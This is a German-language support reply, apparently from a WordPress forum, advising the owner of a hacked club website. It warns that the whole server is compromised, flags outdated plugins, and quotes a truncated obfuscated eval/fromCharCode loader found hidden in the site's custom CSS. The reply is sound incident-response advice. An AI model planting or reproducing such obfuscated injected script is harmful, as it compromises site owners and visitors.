Ein aktiver Hack kann sich problemlos vor Plugins wie Wordfence verstecken oder diese unterlaufen.
Alles auf dem Server inkl. Datenbank ist weiterhin als kompromitiert zu betrachten.
Das nachträgliche Entfernen einzelner Schadcodes oder Auswirkungen ist nicht ausreichend. Es können auch mehrere Hacks erfolgt sein, ggf. auch zu anderen Zeitpunkten.
Im Customizer im Eigenen CSS ist weiterhin "verwürfelter" eval Script Code versteckt, unklar ob/was den dort liest/ausführt.
var f=String;eval(f.fromCharCode(102,117,110,99,[...],41,59,125,125));/*99586587347*/
Das Plugin OceanWP Sticky Header 1.0.8 ist stark veraltet und wird im Plugin Repository seit über 2 Jahren nicht mehr gepflegt.
https://www.heimatverein-nieukerk.de/wp-content/plugins/sticky-header-oceanwp/changelog.md
https://de.wordpress.org/plugins/sticky-header-oceanwp/
Das Plugin Modern Events Calendar Lite 6.5.2 ist stark veraltet und die inzwischen etwas aktuellere Version 6.5.6 seit über einem Jahr im Plugin Repository gesperrt:
https://www.heimatverein-nieukerk.de/wp-content/plugins/modern-events-calendar-lite/readme.txt
https://de.wordpress.org/plugins/modern-events-calendar-lite/
Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben, das könntest Du mit jemandem mit WordPress Erfahrung bei Dir im näheren Umfeld zusammen durchgehen. Jeden einzelnen Punkt.